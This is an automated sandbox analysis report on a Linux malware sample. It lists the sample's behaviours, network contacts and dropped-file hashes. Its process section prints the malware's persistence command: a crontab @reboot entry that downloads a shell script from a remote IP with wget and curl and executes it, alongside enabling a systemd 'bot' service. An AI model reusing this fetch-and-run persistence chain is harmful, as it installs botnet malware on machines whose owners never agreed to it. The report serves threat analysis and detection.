Analysis Overview
SHA256
2f20edab143d494f6b418df73ba190b861e499878258ff45496974a261acd661
Threat Level: Shows suspicious behavior
The file ccdcabc06ed12d315440fabad4c0e7a9.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
Changes its process name
Modifies Watchdog functionality
Creates/modifies Cron job
Creates/modifies environment variables
Enumerates active TCP sockets
Enumerates running processes
Modifies systemd
Modifies Bash startup script
Reads system network configuration
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-08 03:41
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-08 03:41
Reported
2024-01-08 03:44
Platform
ubuntu1804-amd64-20231215-en
Max time kernel
141s
Max time network
154s
Command Line
Signatures
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | /bin/busybox | /tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.uIfVKk | /usr/bin/crontab | N/A |
Creates/modifies environment variables
| Description | Indicator | Process | Target |
| File opened for modification | /root/.bashrc | N/A | N/A |
Enumerates active TCP sockets
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/tcp | N/A | N/A |
Enumerates running processes
Modifies systemd
| Description | Indicator | Process | Target |
| File opened for modification | /lib/systemd/system/bot.service | N/A | N/A |
Modifies Bash startup script
| Description | Indicator | Process | Target |
| File opened for modification | /root/.bashrc | N/A | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/tcp | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/532/fd | N/A | N/A |
| File opened for reading | /proc/947/stat | N/A | N/A |
| File opened for reading | /proc/1065/stat | N/A | N/A |
| File opened for reading | /proc/170/stat | N/A | N/A |
| File opened for reading | /proc/168/cmdline | N/A | N/A |
| File opened for reading | /proc/265/stat | N/A | N/A |
| File opened for reading | /proc/1141/cmdline | N/A | N/A |
| File opened for reading | /proc/34/cmdline | N/A | N/A |
| File opened for reading | /proc/1519/stat | N/A | N/A |
| File opened for reading | /proc/1520/cmdline | N/A | N/A |
| File opened for reading | /proc/1557/stat | N/A | N/A |
| File opened for reading | /proc/156/stat | N/A | N/A |
| File opened for reading | /proc/78/fd | N/A | N/A |
| File opened for reading | /proc/1255/fd | N/A | N/A |
| File opened for reading | /proc/28/fd | N/A | N/A |
| File opened for reading | /proc/17/fd | N/A | N/A |
| File opened for reading | /proc/24/stat | N/A | N/A |
| File opened for reading | /proc/84/stat | N/A | N/A |
| File opened for reading | /proc/1547/fd | N/A | N/A |
| File opened for reading | /proc/1556/stat | N/A | N/A |
| File opened for reading | /proc/14/stat | N/A | N/A |
| File opened for reading | /proc/1111/cmdline | N/A | N/A |
| File opened for reading | /proc/1088/cmdline | N/A | N/A |
| File opened for reading | /proc/30/fd | N/A | N/A |
| File opened for reading | /proc/154/stat | N/A | N/A |
| File opened for reading | /proc/1136/stat | N/A | N/A |
| File opened for reading | /proc/1190/cmdline | N/A | N/A |
| File opened for reading | /proc/1290/fd | N/A | N/A |
| File opened for reading | /proc/27/stat | N/A | N/A |
| File opened for reading | /proc/82/fd | N/A | N/A |
| File opened for reading | /proc/162/fd | N/A | N/A |
| File opened for reading | /proc/171/stat | N/A | N/A |
| File opened for reading | /proc/1112/stat | N/A | N/A |
| File opened for reading | /proc/2/fd | N/A | N/A |
| File opened for reading | /proc/254/cmdline | N/A | N/A |
| File opened for reading | /proc/638/fd | N/A | N/A |
| File opened for reading | /proc/160/stat | N/A | N/A |
| File opened for reading | /proc/11/fd | N/A | N/A |
| File opened for reading | /proc/83/fd | N/A | N/A |
| File opened for reading | /proc/164/fd | N/A | N/A |
| File opened for reading | /proc/332/cmdline | N/A | N/A |
| File opened for reading | /proc/454/stat | N/A | N/A |
| File opened for reading | /proc/1124/fd | N/A | N/A |
| File opened for reading | /proc/1328/fd | N/A | N/A |
| File opened for reading | /proc/9/cmdline | N/A | N/A |
| File opened for reading | /proc/36/fd | N/A | N/A |
| File opened for reading | /proc/1539/stat | N/A | N/A |
| File opened for reading | /proc/34/stat | N/A | N/A |
| File opened for reading | /proc/662/stat | N/A | N/A |
| File opened for reading | /proc/26/fd | N/A | N/A |
| File opened for reading | /proc/163/stat | N/A | N/A |
| File opened for reading | /proc/711/cmdline | N/A | N/A |
| File opened for reading | /proc/1120/fd | N/A | N/A |
| File opened for reading | /proc/1164/stat | N/A | N/A |
| File opened for reading | /proc/1520/stat | N/A | N/A |
| File opened for reading | /proc/1552/cmdline | N/A | N/A |
| File opened for reading | /proc/10/fd | N/A | N/A |
| File opened for reading | /proc/460/cmdline | N/A | N/A |
| File opened for reading | /proc/952/cmdline | N/A | N/A |
| File opened for reading | /proc/1141/fd | N/A | N/A |
| File opened for reading | /proc/1460/fd | N/A | N/A |
| File opened for reading | /proc/1529/stat | N/A | N/A |
| File opened for reading | /proc/1527/fd | N/A | N/A |
| File opened for reading | /proc/79/cmdline | N/A | N/A |
Processes
/tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf
[/tmp/9478bb8fa96a4b9baa199be60285800027abb1fd296ca8e0a0fd26ee647c49ff.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot /bin/bash -c "/bin/wget http://82.165.215.205/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://82.165.215.205/bins/bins.sh; chmod +x bins.sh; sh bins.sh"") | crontab -]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab -]
/bin/chmod
[chmod +x bins.sh]
/bin/sh
[sh bins.sh]
/bin/curl
[/bin/curl -k -L --output bins.sh http://82.165.215.205/bins/bins.sh]
/bin/chmod
[chmod +x bins.sh]
/bin/sh
[sh bins.sh]
/bin/sh
[sh -c /bin/systemctl enable bot]
/bin/systemctl
[/bin/systemctl enable bot]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 151.101.2.49:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 89.187.167.3:443 | tcp | |
| US | 1.1.1.1:53 | apple.bbos.ink | udp |
| LT | 176.223.133.62:1290 | apple.bbos.ink | tcp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp |
Files
/var/spool/cron/crontabs/tmp.uIfVKk
| MD5 | 2f16a50a03b078ad9d67f3835641e9fd |
| SHA1 | 8317001974fe8b4806e2377f4e62f9c74d588388 |
| SHA256 | 2d76916fafe2a76c0ec1fe539d813bec0aa03cf12d6a5301490d21dff498698f |
| SHA512 | 20b097960cce1f804f9be20f7ec9f36c75bfaba2dfaf6bf083433229d38db19896e9b95110eb47e6cafb69c8bc8f916a668115c2187ff00acf8833d607a18c85 |
/lib/systemd/system/bot.service
| MD5 | d77308e381db6ea7245af6f3b7be118e |
| SHA1 | 0a0f20a03f4db351a404954c780eebd15b3775bb |
| SHA256 | feb6c31fee6eedbf83b5d657838427588bc7426532238a2675b8dbb74c9bf55b |
| SHA512 | 68c2b02daaaaa8d34e8f0a9264894fd781527b3b855477ac9435145daf5063e46d9abd7684f7c52be4f27850890be5261837dd3ad3f7a5a54d9343e2e6cda0e4 |